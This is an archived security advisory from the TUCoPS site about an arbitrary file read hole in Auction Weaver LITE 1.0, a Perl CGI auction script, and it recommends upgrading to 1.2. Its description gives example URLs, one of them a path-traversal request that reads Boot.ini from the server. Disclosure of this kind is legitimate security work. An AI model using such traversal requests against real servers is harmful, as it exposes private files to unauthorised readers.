Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: weaver1.htm

Auction Weaver Read Arbitrary Files



Vulnerability

    Auction Weaver

Affected

    Auction WeaverT LITE 1.0

Description

    Meliksah  Ozoral  found  following.   Auction  Weaver allow you to
    read files from server.  Remote users can view source of files  on
    server.

        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=cat17&fromfile=967251278%2Edat
        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini

Solution

	Upgrade to 1.2.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH